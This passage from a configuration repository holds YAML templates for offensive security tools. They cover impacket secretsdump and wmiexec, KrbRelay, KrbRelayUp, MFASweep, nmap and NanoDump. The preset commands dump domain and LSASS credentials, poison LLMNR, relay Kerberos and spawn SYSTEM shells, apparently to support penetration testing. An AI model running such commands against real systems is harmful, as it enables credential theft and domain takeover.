If not specified script will run in domain mode. 155 | template: "-targets {0}" 156 | default: 'targets.txt' 157 | optional: true 158 | selected: false 159 | 160 | 161 | 162 | - name: delay 163 | type: text 164 | description: Seconds delay between starting each batch probe (default 10 seconds) 165 | template: "-delay {0}" 166 | default: "10" 167 | optional: true 168 | selected: false 169 | 170 | - name: max-connections 171 | type: text 172 | description: Max amount of connections to keep opened (default 1000) 173 | template: "-max-connections {0}" 174 | default: "1000" 175 | optional: false 176 | 177 | 178 | - name: system 179 | type: text 180 | description: SYSTEM hive to parse 181 | template: 182 | default: 183 | optional: false 184 | 185 | 186 | - name: bootkey 187 | type: text 188 | description: bootkey for SYSTEM hive 189 | template: 190 | default: 191 | optional: false 192 | 193 | - name: security 194 | type: text 195 | description: SECURITY hive to parse 196 | template: 197 | default: 198 | optional: false 199 | 200 | 201 | - name: sam 202 | type: text 203 | description: SAM hive to parse 204 | template: 205 | default: 206 | optional: false 207 | 208 | 209 | - name: ntds 210 | type: text 211 | description: NTDS.DIT file to parse 212 | template: "-ntds {0}" 213 | default: "ntds.dit" 214 | optional: true 215 | selected: false 216 | 217 | - name: resumefile 218 | type: text 219 | description: Resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state 220 | template: "-resumefile {0}" 221 | default: "" 222 | optional: true 223 | 224 | 225 | - name: outputfile 226 | type: text 227 | description: Base output filename. 
Extensions will be added for sam, secrets, cached and ntds 228 | template: "-outputfile {0}" 229 | default: "outputfile.txt" 230 | optional: true 231 | 232 | 233 | - name: rodcNo 234 | type: text 235 | description: Number of the RODC krbtgt account (only available for Kerb-Key-List approach) 236 | template: "-rodcNo {0}" 237 | default: "" 238 | optional: true 239 | 240 | - name: rodcKey 241 | type: text 242 | description: AES key of the Read Only Domain Controller (only available for Kerb-Key-List approach) 243 | template: "-rodcKey {0}" 244 | default: "" 245 | optional: true 246 | 247 | - name: exec-method 248 | description: Remote exec method to use at target (only when using -use-vss). Default - smbexec 249 | template: "-exec-method {0}" 250 | type: select 251 | default: smbexec 252 | options: ["smbexec","wmiexec","mmcexec"] 253 | optional: true 254 | 255 | - name: just-dc-user 256 | type: text 257 | description: Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch 258 | template: "-just-dc-user {0}" 259 | default: "targeteduser" 260 | optional: true 261 | 262 | - name: no-pass 263 | type: flag 264 | description: Don't ask for password (useful for -k) 265 | value: "-no-pass" 266 | optional: true 267 | selected: false 268 | 269 | - name: kerberos 270 | type: flag 271 | description: Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. 
272 | value: '-k' 273 | optional: true 274 | selected: false 275 | 276 | 277 | - name: just-dc 278 | type: flag 279 | description: Extract only NTDS.DIT data (NTLM hashes and Kerberos keys) 280 | value: "-just-dc" 281 | optional: true 282 | selected: false 283 | 284 | - name: just-dc-ntlm 285 | type: flag 286 | description: Extract only NTDS.DIT data (NTLM hashes only) 287 | value: "-just-dc-ntlm" 288 | optional: true 289 | selected: false 290 | 291 | 292 | - name: pwd-last-set 293 | type: flag 294 | description: Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data 295 | value: "-pwd-last-set" 296 | optional: true 297 | selected: false 298 | 299 | 300 | - name: user-status 301 | type: flag 302 | description: Display whether or not the user is disabled 303 | value: "-user-status" 304 | optional: true 305 | selected: false 306 | 307 | - name: history 308 | type: flag 309 | description: Dump password history, and LSA secrets OldVal 310 | value: "-history" 311 | optional: true 312 | selected: false 313 | 314 | 315 | - name: nooutput 316 | description: 'Whether or not to print the output' 317 | optional: true 318 | selected: false 319 | type: flag 320 | value: "-nooutput" 321 | 322 | - name: ts 323 | type: flag 324 | description: Adds timestamp to every logging output 325 | value: '-ts' 326 | optional: false 327 | 328 | - name: silentcommand 329 | type: flag 330 | description: Does not execute cmd.exe to run given command (no output) 331 | value: '-silentcommand' 332 | optional: true 333 | selected: false 334 | 335 | - name: debug 336 | type: flag 337 | description: Turn DEBUG output ON 338 | value: '-debug' 339 | optional: true 340 | selected: false 341 | 342 | - name: use-vss 343 | type: flag 344 | description: Use the VSS method instead of default DRSUAPI 345 | value: "-use-vss" 346 | optional: true 347 | selected: false 348 | 349 | - name: use-keylist 350 | type: flag 351 | description: Use the Kerb-Key-List method instead of 
default DRSUAPI 352 | value: "-use-keylist" 353 | optional: true 354 | selected: false 355 | 356 | - name: noloop 357 | type: flag 358 | description: Stop after the first probe 359 | value: "-noloop" 360 | optional: true 361 | selected: false 362 | 363 | - name: csv 364 | type: flag 365 | description: Turn CSV output 366 | value: "-csv" 367 | optional: true 368 | selected: false 369 | 370 | 371 | sections: 372 | - name: wmiexec 373 | labels: [] 374 | mitre: "" 375 | verb: 'wmiexec.py' 376 | required_flags: [target] 377 | optional_flags: ["share","nooutput","ts","silentcommand","debug","codec","shell-type","com-version","hashes","no-pass","kerberos","aesKey","dc-ip","auth-file","keytab","command"] 378 | - name: secretsdump 379 | labels: [] 380 | mitre: "" 381 | verb: 'secretsdump.py' 382 | required_flags: [target] 383 | optional_flags: ["ts","debug","system","bootkey","security","sam","ntds","resumefile","outputfile","use-vss","rodcNo","rodcKey","use-keylist","exec-method","just-dc-user","just-dc","just-dc-ntlm","pwd-last-set","user-status","history","hashes","no-pass","kerberos","aesKey","keytab","dc-ip","target-ip"] 384 | - name: samrdump 385 | labels: [] 386 | mitre: "" 387 | verb: 'samrdump.py' 388 | required_flags: [target] 389 | optional_flags: ["csv","ts","debug","dc-ip","target-ip","port","hashes","no-pass","kerberos","aesKey"] 390 | - name: rpcdump 391 | labels: [] 392 | mitre: '' 393 | verb: 'rpcdump.py' 394 | required_flags: [target] 395 | optional_flags: ["debug","target-ip","port","hashes"] 396 | - name: netview 397 | labels: [] 398 | mitre: '' 399 | verb: 'netview.py' 400 | required_flags: [identity] 401 | optional_flags: ["user","users","target","targets","noloop","delay","max-connections","ts","debug","hashes","no-pass","kerberos","aesKey","dc-ip"] -------------------------------------------------------------------------------- /commands/KrbRelay.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | 
projectLink: https://github.com/cube0x0/KrbRelay 3 | name: KrbRelay 4 | languages: 5 | - name: EXE 6 | prefix: KrbRelay.exe 7 | 8 | params: 9 | 10 | - name: Target 11 | type: label 12 | 13 | - name: spn 14 | type: text 15 | description: ServicePrincipalName for the target service 16 | template: "-spn {0}" 17 | default: 'ldap/dc01.htb.local' 18 | optional: false 19 | 20 | - name: clsid 21 | description: 22 | default: 23 | template: "-clsid {0}" 24 | type: select 25 | options: [ 26 | # SYSTEM Relay 27 | 90f18417-f0f1-484e-9d3c-59dceee5dbd8, # RPC_C_IMP_LEVEL_IDENTIFY (Windows 10 1903, Server 2019, Server 2016) 28 | 0bae55fc-479f-45c2-972e-e951be72c0c1, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903) 29 | # Cross-Session Relay 30 | 0289a7c5-91bf-4547-81ae-fec91a89dec5, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 31 | 1f87137d-0e7c-44d5-8c73-4effb68962f2, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 32 | 73e709ea-5d93-4b2e-bbb0-99b7938da9e4, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 33 | 9678f47f-2435-475c-b24a-4606f8161c16, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 34 | 9acf41ed-d457-4cc1-941b-ab02c26e4686, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 35 | ce0e0be8-cf56-4577-9577-34cc96ac087c, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 36 | 354ff91b-5e49-4bdc-a8e6-1cb6c6877182, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2019) 37 | 38e441fb-3d16-422f-8750-b2dacec5cefc, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2019) 38 | f8842f8e-dafe-4b37-9d38-4e0714a61149, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2019) 39 | 5f7f3f7b-1177-4d4b-b1db-bc6f671b8f25, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2016) 40 | 98068995-54d2-4136-9bc9-6dbcb0a4683f, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2016) 41 | bdb57ff2-79b9-4205-9447-f5fe85f37312, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2016) 42 | ] 43 | optional: false 44 | 45 | 46 | - name: optionalTarget 47 | type: text 48 | description: Optional target 
parameter for a given attack. Tool will use localhost if omitted 49 | template: "{0}" 50 | default: '' 51 | optional: false 52 | 53 | - name: LDAP Attacks (Pick one) 54 | type: label 55 | 56 | - name: rbcd 57 | type: text 58 | description: Configure RBCD for a given SID (default to localhost) 59 | template: "-rbcd {0} {optionalTarget}" 60 | default: '' 61 | optional: true 62 | 63 | - name: addGroupMember 64 | type: text 65 | description: desc 66 | template: "-addGroupMember {0}" 67 | default: ' ' 68 | optional: true 69 | 70 | - name: resetPassword 71 | type: text 72 | description: Reset domain user password 73 | template: "-reset-password {0}" 74 | default: ' ' 75 | optional: true 76 | 77 | - name: shadowcred 78 | type: flag 79 | description: Configure msDS-KeyCredentialLink (default to localhost) 80 | template: "-shadowcred {optionalTarget}" 81 | optional: true 82 | selected: true 83 | 84 | - name: laps 85 | type: flag 86 | description: Dump LAPS passwords (default to localhost) 87 | template: "-laps {optionalTarget}" 88 | optional: true 89 | selected: false 90 | 91 | - name: gMSA 92 | type: flag 93 | description: Dump gMSA passwords (default to localhost) 94 | template: "-gMSA {optionalTarget}" 95 | optional: true 96 | selected: false 97 | 98 | - name: SMB Attacks (Pick one) 99 | type: label 100 | 101 | - name: addPrivileges 102 | type: text 103 | description: Add privileges for a given SID 104 | template: "-add-privileges {0}" 105 | default: '' 106 | optional: true 107 | 108 | - name: serviceAdd 109 | type: text 110 | description: Create SYSTEM service 111 | template: "-service-add {0}" 112 | default: ' ' 113 | optional: true 114 | 115 | - name: secrets 116 | type: flag 117 | description: Dump SAM & LSA secrets 118 | value: '-secrets' 119 | optional: true 120 | selected: true 121 | 122 | - name: list 123 | type: flag 124 | description: List SMB shares 125 | value: '-list' 126 | optional: true 127 | selected: false 128 | 129 | - name: HTTP Attacks 130 | type: 
label 131 | 132 | - name: endpoint 133 | type: text 134 | description: Endpoint URI to listen 135 | template: "{0}" 136 | default: 'EWS/Exchnage.asmx' 137 | optional: true 138 | selected: true 139 | 140 | - name: ewsDelegate 141 | type: text 142 | description: EWS delegate mailbox 143 | template: "-ews-delegate {0}" 144 | default: '' 145 | optional: true 146 | 147 | - name: ewsSearch 148 | type: text 149 | description: Search inbox for keywords 150 | template: "-ews-search {0}" 151 | default: '' 152 | optional: true 153 | 154 | - name: proxy 155 | type: flag 156 | description: Start an HTTP proxy server against target 157 | value: '-proxy' 158 | optional: true 159 | selected: false 160 | 161 | - name: Options 162 | type: label 163 | 164 | - name: console 165 | type: flag 166 | description: Launch interactive console over the relay of LDAP/SMB protocols 167 | value: '-console' 168 | optional: true 169 | selected: false 170 | 171 | - name: session 172 | type: text 173 | description: ID for cross session marshalling 174 | template: "-session {0}" 175 | default: '2' 176 | optional: false 177 | 178 | - name: port 179 | type: text 180 | description: COM listener port 181 | template: "{0}" 182 | default: 183 | optional: false 184 | 185 | - name: llmnr 186 | type: flag 187 | description: Activate LLMNR poisoning 188 | value: '-llmnr' 189 | optional: true 190 | selected: false 191 | 192 | - name: ssl 193 | type: flag 194 | description: Switch to use SSL transport 195 | value: '-ssl' 196 | optional: true 197 | selected: false 198 | 199 | 200 | sections: 201 | - name: Local Privilege Escalation attacking LDAP SPN to create msDS-KeyCredentialLink on the localhost 202 | labels: [PrivEsc] 203 | mitre: '' 204 | verb: '' 205 | required_flags: [spn, clsid, shadowcred] 206 | optional_flags: [ssl, console] 207 | 208 | 209 | - name: Poison LLMNR to coerce victims into creating and sending service tickets of a given SMB related SPN 210 | labels: [PrivEsc] 211 | mitre: 'T1557.001' 212 | 
verb: '' 213 | required_flags: [llmnr, spn] 214 | optional_flags: [secrets, serviceAdd, addPrivileges, list, console] 215 | 216 | 217 | - name: Exploit cross-session LDAP, choosing any LDAP attack 218 | labels: [PrivEsc] 219 | mitre: 'T1557.001' 220 | verb: '' 221 | required_flags: [spn, session, clsid] 222 | optional_flags: [rbcd, shadowcred, addGroupMember, laps, gMSA, resetPassword, ssl, console] 223 | 224 | - name: Exploit cross-session HTTP, choosing any HTTP attack 225 | labels: [PrivEsc] 226 | mitre: '' 227 | verb: '' 228 | required_flags: [spn,endpoint, session,clsid] 229 | optional_flags: [ewsSearch, ewsDelegate, proxy, ssl] 230 | 231 | - name: Exploit cross-session SMB, chossing any SMB attack 232 | labels: [PrivEsc] 233 | mitre: 'T1557.001' 234 | verb: '' 235 | required_flags: [spn,session,clsid] 236 | optional_flags: [addPrivileges, secrets, serviceAdd, console] -------------------------------------------------------------------------------- /commands/KrbRelayUp.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Dec0ne/KrbRelayUp 3 | name: KrbRelayUp 4 | languages: 5 | - name: EXE 6 | prefix: KrbRelayUp.exe 7 | 8 | params: 9 | 10 | 11 | - name: Exploitation 12 | type: label 13 | 14 | - name: method 15 | description: Abuse method to use in after a successful relay to LDAP (default=rbcd) 16 | default: '' 17 | template: "-m {0}" 18 | type: select 19 | options: [rbcd,shadowcred,adcs] 20 | optional: false 21 | 22 | - name: port 23 | type: text 24 | description: Port for Com Server (default=12345) (RELAY) 25 | template: "-p {0}" 26 | default: '12345' 27 | optional: true 28 | 29 | - name: clsid 30 | description: CLSID to use for coercing Kerberos auth from local machine account (default=90f18417-f0f1-484e-9d3c-59dceee5dbd8) (RELAY) 31 | default: 32 | template: "-cls {0}" 33 | type: select 34 | options: [ 35 | # SYSTEM Relay 36 | 90f18417-f0f1-484e-9d3c-59dceee5dbd8, # 
RPC_C_IMP_LEVEL_IDENTIFY (Windows 10 1903, Server 2019, Server 2016) 37 | 0bae55fc-479f-45c2-972e-e951be72c0c1, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903) 38 | ] 39 | optional: true 40 | 41 | - name: impersonate 42 | type: text 43 | description: User to impersonate. should be a local administrator in the target computer. (default=Administrator) (SPAWN) 44 | template: "-i {0}" 45 | default: '' 46 | optional: true 47 | 48 | - name: ServiceName 49 | type: text 50 | description: Name of the service to be created. (default=KrbSCM) (SPAWN/KRBSCM) 51 | template: "-s {0}" 52 | default: '' 53 | optional: true 54 | 55 | - name: ServiceCommand 56 | type: text 57 | description: Service command [binPath]. (default = spawn cmd.exe as SYSTEM) (SPAWN/KRBSCM) 58 | template: "-sc {0}" 59 | default: '' 60 | optional: true 61 | 62 | 63 | 64 | - name: RBCD Options 65 | type: label 66 | 67 | - name: CreateNewComputerAccount 68 | type: flag 69 | description: Create new computer account for RBCD. Will use the current authenticated user. 70 | value: '-c' 71 | optional: true 72 | selected: false 73 | 74 | - name: ComputerName 75 | type: text 76 | description: Name of attacker owned computer account for RBCD. (default=KRBRELAYUP$) 77 | template: "-cn {0}" 78 | default: '' 79 | optional: true 80 | 81 | - name: ComputerPassword 82 | type: text 83 | description: Password of computer account for RBCD. (default=RANDOM [if -c is enabled]) 84 | template: "-cp {0}" 85 | default: '' 86 | optional: true 87 | 88 | - name: ComputerHash 89 | type: text 90 | description: Password NT hash of computer account for RBCD. (either -cp or -ch must be specified) (SPAWN) 91 | template: "-ch {0}" 92 | default: 93 | optional: true 94 | 95 | - name: ADCS / Shadowcred Options 96 | type: label 97 | 98 | - name: ForceShadowCred 99 | type: flag 100 | description: Clear the msDS-KeyCredentialLink attribute of the attacked computer account before adding our new shadow credentials. 
(SHADOWCRED only) 101 | value: '-f' 102 | optional: true 103 | selected: false 104 | - name: CAEndpoint 105 | type: text 106 | description: CA endpoint FQDN (default = same as DC) 107 | template: "-ca {0}" 108 | default: '' 109 | optional: true 110 | 111 | - name: CertificateTemplate 112 | type: text 113 | description: Certificate template to request for (default=Machine) 114 | template: "-cet {0}" 115 | default: '' 116 | optional: true 117 | 118 | - name: certificate 119 | type: text 120 | description: Base64 encoded certificate or path to certificate file 121 | template: "-ce {0}" 122 | default: 123 | optional: true 124 | 125 | - name: CertificatePassword 126 | type: text 127 | description: Certificate password (if applicable) 128 | template: "-cep {0}" 129 | default: 'SomeCompPassword' 130 | optional: true 131 | selected: false 132 | 133 | - name: https 134 | type: flag 135 | description: Connect to CA endpoint over secure HTTPS instead of HTTP) 136 | value: '-https' 137 | optional: true 138 | selected: false 139 | 140 | - name: General Options 141 | type: label 142 | 143 | - name: domain 144 | type: text 145 | description: FQDN of domain. (Optional) 146 | template: "-d {0}" 147 | default: '' 148 | optional: true 149 | 150 | - name: domainController 151 | type: text 152 | description: FQDN of domain controller. (Optional) 153 | template: "-dc {0}" 154 | default: '' 155 | optional: true 156 | 157 | - name: ssl 158 | type: flag 159 | description: Use LDAP over SSL. (Optional) 160 | value: '-ssl' 161 | optional: true 162 | selected: false 163 | 164 | - name: CreateNetOnly 165 | type: flag 166 | description: Use CreateNetOnly (needs to be on disk) instead of PTT when importing ST (enabled if using FULL mode) 167 | value: '-n' 168 | optional: true 169 | selected: false 170 | 171 | - name: verbose 172 | type: flag 173 | description: Show verbose output. 
(Optional) 174 | value: '-v' 175 | optional: true 176 | selected: false 177 | 178 | 179 | sections: 180 | - name: Create computer account, force SYSTEM account auth via COM server, relay to LDAP, and assign RBCD rights to created computer 181 | labels: [PrivEsc, LDAP] 182 | mitre: 'T1557.001' 183 | verb: 'relay' 184 | required_flags: [domain, CreateNewComputerAccount, ComputerName, ComputerPassword] 185 | optional_flags: [domainController,ssl,verbose] 186 | 187 | - name: Use owned computer account with RBCD rights to spawn SYSTEM shell 188 | labels: [PrivEsc,Kerberos] 189 | mitre: 'T1543.003' 190 | verb: 'spwan' 191 | required_flags: [domain, ComputerName, ComputerPassword] 192 | optional_flags: [ComputerPassword, ComputerHash] 193 | 194 | - name: Execute the full attack to spawn SYSTEM shell, choosing any attack method 195 | labels: [PrivEsc] 196 | mitre: 'T1557.001' 197 | verb: 'full' 198 | required_flags: [method] 199 | optional_flags: [domain,domainController,certificate,CertificatePassword,CreateNetOnly,ForceShadowCred,ssl,verbose] 200 | 201 | - name: Use the currently loaded Kerberos Service Ticket to create a new service running as SYSTEM 202 | labels: [PrivEsc] 203 | mitre: 'T1543.003' 204 | verb: krbscm 205 | required_flags: [ServiceName, ServiceCommand] 206 | optional_flags: [verbose] 207 | 208 | - name: Craft a custom command for full attack 209 | labels: [PrivEsc] 210 | mitre: '' 211 | verb: 'full' 212 | required_flags: [method] 213 | optional_flags: [port,clsid,domain,domainController,certificate,CAEndpoint,CertificateTemplate,CertificatePassword,CreateNetOnly,ForceShadowCred,CreateNewComputerAccount,ComputerName,ComputerHash,ComputerPassword,ServiceName,ServiceCommand,impersonate,https,ssl,verbose] -------------------------------------------------------------------------------- /commands/MFASweep.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/dafthack/MFASweep 3 | 
name: MFASweep 4 | languages: 5 | - name: PS 6 | prefix: "" 7 | 8 | params: 9 | - name: MFASweepEndpoint 10 | description: Selected target endpoint to test for MFA 11 | default: 'Invoke-MFASweep' 12 | template: "{0}" 13 | type: select 14 | options: [ 15 | 'Invoke-MFASweep', 16 | 'Invoke-GraphAPIAuth', 17 | 'Invoke-AzureManagementAPIAuth', 18 | 'Invoke-EWSAuth', 19 | 'Invoke-O365WebPortalAuth', 20 | 'Invoke-O365WebPortalAuthMobile', 21 | 'Invoke-O365ActiveSyncAuth', 22 | 'Invoke-ADFSAuth' 23 | ] 24 | optional: false 25 | 26 | - name: Username 27 | type: text 28 | description: Username 29 | template: "-Username {0}" 30 | default: User1 31 | optional: false 32 | - name: Password 33 | type: text 34 | description: Password 35 | template: "-Password {0}" 36 | default: 37 | optional: false 38 | 39 | - name: Recon 40 | type: flag 41 | description: Reconnaissance 42 | value: -Recon 43 | optional: true 44 | selected: false 45 | - name: IncludeADFS 46 | type: flag 47 | description: Include ADFS 48 | value: -IncludeADFS 49 | optional: true 50 | selected: false 51 | 52 | sections: 53 | - name: Self crafted command 54 | labels: ["Recon"] 55 | mitre: '' 56 | verb: '' 57 | required_flags: [MFASweepEndpoint, Username, Password] 58 | optional_flags: [Recon, IncludeADFS] 59 | - name: Test Azure APIs for MFA 60 | labels: ["Recon"] 61 | mitre: '' 62 | verb: 'Invoke-MFASweep' 63 | required_flags: [Username, Password] 64 | optional_flags: [Recon, IncludeADFS] 65 | - name: Test Microsoft Graph API for MFA 66 | labels: ["Recon"] 67 | mitre: '' 68 | verb: 'Invoke-GraphAPIAuth' 69 | required_flags: [Username, Password] 70 | optional_flags: [] 71 | - name: Test Azure Service Management API for MFA 72 | labels: ["Recon"] 73 | mitre: '' 74 | verb: 'Invoke-AzureManagementAPIAuth' 75 | required_flags: [Username, Password] 76 | optional_flags: [] 77 | - name: Test Microsoft 365 Exchange Web Services for MFA 78 | labels: ["Recon"] 79 | mitre: '' 80 | verb: 'Invoke-EWSAuth' 81 | required_flags: 
[Username, Password] 82 | optional_flags: [] 83 | - name: Test Microsoft 365 Web Portal for MFA 84 | labels: ["Recon"] 85 | mitre: '' 86 | verb: 'Invoke-O365WebPortalAuth' 87 | required_flags: [Username, Password] 88 | optional_flags: [] 89 | - name: Test Microsoft 365 Web Portal w/ Mobile User Agent for MFA 90 | labels: ["Recon"] 91 | mitre: '' 92 | verb: 'Invoke-O365WebPortalAuthMobile' 93 | required_flags: [Username, Password] 94 | optional_flags: [] 95 | - name: Microsoft 365 Active Sync for MFA 96 | labels: ["Recon"] 97 | mitre: '' 98 | verb: 'Invoke-O365ActiveSyncAuth' 99 | required_flags: [Username, Password] 100 | optional_flags: [] 101 | - name: Test ADFS for MFA 102 | labels: ["Recon"] 103 | mitre: '' 104 | verb: 'Invoke-ADFSAuth' 105 | required_flags: [Username, Password] 106 | optional_flags: [] -------------------------------------------------------------------------------- /commands/NMAP.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/nmap/nmap 3 | name: NMAP 4 | languages: 5 | - name: Linux 6 | prefix: nmap 7 | - name: EXE 8 | prefix: nmap.exe 9 | 10 | params: 11 | - name: Target Host/s 12 | type: label 13 | - name: Target 14 | type: text 15 | description: Specify IP or a list of IPs seperated by space 16 | template: "{0}" 17 | default: "192.168.1.1" 18 | optional: true 19 | selected: true 20 | - name: TargetsFromFile 21 | type: text 22 | description: Path to file containing targets to scan 23 | template: "-iL {0}" 24 | default: targets.txt 25 | optional: true 26 | selected: true 27 | 28 | - name: Target Ports 29 | type: label 30 | - name: Ports 31 | type: text 32 | description: Ports to scan. 
33 | template: "-p {0}" 34 | default: 22-25,80,135-139,443,445,8080,8000,8081,9090 35 | optional: true 36 | selected: false 37 | - name: TopPorts 38 | type: text 39 | description: Port scan the top x ports 40 | template: "--top-ports {0}" 41 | default: 1000 42 | optional: true 43 | 44 | - name: Output 45 | type: label 46 | - name: OutputType 47 | type: select 48 | description: Output file type 49 | template: "-o{0}" 50 | default: "All" 51 | optional: false 52 | options: ["Nmap", "Xml", "Greppable", "All"] 53 | - name: OutputPrefix 54 | type: text 55 | description: The name of the output file 56 | template: "-oA {0}" 57 | default: output 58 | optional: true 59 | 60 | 61 | - name: Scan options 62 | type: label 63 | - name: ScanSpeed 64 | type: select 65 | description: Specify scanning speed to use. Paranoid (0) - SuperFast (5) 66 | template: "-T{0}" 67 | default: "3" 68 | optional: true 69 | options: ["0","1","2","3","4","5"] 70 | - name: SynScan 71 | type: flag 72 | description: TCP SYN (half-open) scan; never completes the TCP handshake. 73 | value: -sS 74 | optional: true 75 | selected: false 76 | - name: NoPing 77 | type: flag 78 | description: Disable host discovery. Port scan only. 79 | value: -Pn 80 | optional: true 81 | selected: false 82 | - name: NoResolving 83 | type: flag 84 | description: Never do DNS resolution 85 | value: -n 86 | optional: true 87 | selected: false 88 | - name: sL 89 | type: flag 90 | description: No Scan. List targets only 91 | value: -sL 92 | optional: true 93 | selected: false 94 | - name: sn 95 | type: flag 96 | description: Disable port scanning. Host discovery only. 97 | value: -sn 98 | optional: true 99 | selected: false 100 | - name: PS 101 | type: flag 102 | description: TCP SYN discovery on port x. Port 80 by default 103 | value: -PS{Ports} 104 | template: -PS{Ports} 105 | optional: true 106 | selected: false 107 | - name: PA 108 | type: flag 109 | description: TCP ACK discovery on port x. 
Port 80 by default 110 | value: -PA{Ports} 111 | template: -PA{Ports} 112 | optional: true 113 | selected: false 114 | - name: PU 115 | type: flag 116 | description: UDP discovery on port x. Port 40125 by default 117 | value: -PU{Ports} 118 | template: -PU{Ports} 119 | optional: true 120 | selected: false 121 | - name: PR 122 | type: flag 123 | description: ARP discovery on local network 124 | value: -PR 125 | optional: true 126 | selected: false 127 | 128 | 129 | 130 | sections: 131 | - name: Basic port scan of a single IP 132 | labels: ["Recon"] 133 | mitre: '' 134 | verb: '' 135 | required_flags: ["Target"] 136 | optional_flags: [Ports, NoResolving, SynScan, NoPing, OutputPrefix] 137 | 138 | 139 | - name: Scan targets from file 140 | labels: ["Recon"] 141 | mitre: '' 142 | verb: '' 143 | required_flags: ["TargetsFromFile"] 144 | optional_flags: [Ports, NoResolving, SynScan, NoPing, OutputPrefix] 145 | 146 | 147 | - name: Speed controlled scan 148 | labels: ["Recon"] 149 | mitre: '' 150 | verb: '' 151 | required_flags: ["Target", "ScanSpeed", "NoPing"] 152 | optional_flags: [] 153 | 154 | 155 | - name: TCP SYN port scan (Default) 156 | labels: ["Recon"] 157 | mitre: '' 158 | verb: '' 159 | required_flags: ["Target", "SynScan"] 160 | optional_flags: [] 161 | 162 | 163 | - name: TCP connect port scan (Default without root privilege) 164 | labels: ["Recon"] 165 | mitre: '' 166 | verb: '' 167 | required_flags: ["Target", "sT"] 168 | optional_flags: [] 169 | 170 | 171 | - name: UDP port scan 172 | labels: ["Recon"] 173 | mitre: '' 174 | verb: '' 175 | required_flags: ["Target", "sU"] 176 | optional_flags: [] 177 | 178 | 179 | - name: TCP ACK port scan 180 | labels: ["Recon"] 181 | mitre: '' 182 | verb: '' 183 | required_flags: ["Target", "sA"] 184 | optional_flags: [] 185 | 186 | 187 | - name: TCP Window port scan 188 | labels: ["Recon"] 189 | mitre: '' 190 | verb: '' 191 | required_flags: ["Target", "sW"] 192 | optional_flags: [] 193 | 194 | 195 | - name: TCP 
Maimon port scan 196 | labels: ["Recon"] 197 | mitre: '' 198 | verb: '' 199 | required_flags: ["Target", "sM"] 200 | optional_flags: [] 201 | 202 | -------------------------------------------------------------------------------- /commands/NanoDump.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/fortra/nanodump 3 | name: NanoDump 4 | languages: 5 | - name: EXE 6 | prefix: 'nanodump.x64.exe' 7 | 8 | params: 9 | - name: Output 10 | type: label 11 | 12 | - name: DumpPath 13 | type: text 14 | description: File path of the dump 15 | template: "--write {0}" 16 | default: 'C:\temp\out.dmp' 17 | optional: true 18 | - name: Valid 19 | type: flag 20 | description: Create a dump with a valid signature 21 | value: "--valid" 22 | optional: true 23 | selected: false 24 | 25 | - name: Dump via handle to LSASS 26 | type: label 27 | 28 | - name: Duplicate 29 | type: flag 30 | description: duplicate a high privileged existing LSASS handle 31 | value: '--duplicate' 32 | optional: true 33 | selected: false 34 | 35 | - name: DuplicateLow 36 | type: flag 37 | description: duplicate a low privileged existing LSASS handle and then elevate it 38 | value: '--duplicate-elevate' 39 | optional: true 40 | selected: false 41 | 42 | - name: SeclogonLeakLocal 43 | type: flag 44 | description: leak an LSASS handle into nanodump via seclogon 45 | value: '--seclogon-leak-local' 46 | optional: true 47 | selected: false 48 | 49 | - name: SeclogonLeakRemote 50 | type: text 51 | description: leak an LSASS handle into another process via seclogon and duplicate it 52 | template: '--seclogon-leak-remote {0}' 53 | default: "C:\\Windows\\notepad.exe" 54 | optional: true 55 | selected: false 56 | - name: SeclogonDuplicate 57 | type: flag 58 | description: make seclogon open a handle to LSASS and duplicate it 59 | value: '--seclogon-duplicate' 60 | optional: true 61 | selected: false 62 | - name: SpoofCallstack 63 | type: flag 64 
| description: open a handle to LSASS using a fake calling stack 65 | value: '--spoof-callstack' 66 | optional: true 67 | selected: false 68 | - name: EelevateHandle 69 | type: flag 70 | description: open a handle to LSASS with low privileges and duplicate it to gain higher privileges 71 | value: '--elevate-handle' 72 | optional: true 73 | selected: false 74 | 75 | - name: Dump via WerFault.exe 76 | type: label 77 | 78 | - name: SilentProcessExit 79 | type: text 80 | description: Force WerFault.exe to dump LSASS via SilentProcessExit 81 | template: '--silent-process-exit {0}' 82 | default: "C:\\Windows\\Temp\\" 83 | optional: true 84 | selected: false 85 | - name: Shtinkering 86 | type: flag 87 | description: Force WerFault.exe to dump LSASS via Shtinkering 88 | value: '--shtinkering' 89 | optional: true 90 | selected: false 91 | 92 | 93 | - name: Fork / Snapshot dump (Avoid Direct Read) 94 | type: label 95 | 96 | - name: Fork 97 | type: flag 98 | description: Fork the target process before dumping 99 | value: '--fork' 100 | optional: true 101 | selected: false 102 | - name: Snapshot 103 | type: flag 104 | description: Snapshot the target process before dumping 105 | value: '--snapshot' 106 | optional: true 107 | selected: false 108 | 109 | 110 | - name: Misc 111 | type: label 112 | 113 | - name: GetPid 114 | type: flag 115 | description: Print the PID of LSASS and exit 116 | value: '--getpid' 117 | optional: true 118 | selected: false 119 | 120 | sections: 121 | - name: Read LSASS indirectly by creating a fork and write the dump to disk with an invalid signature 122 | labels: [LSASS, 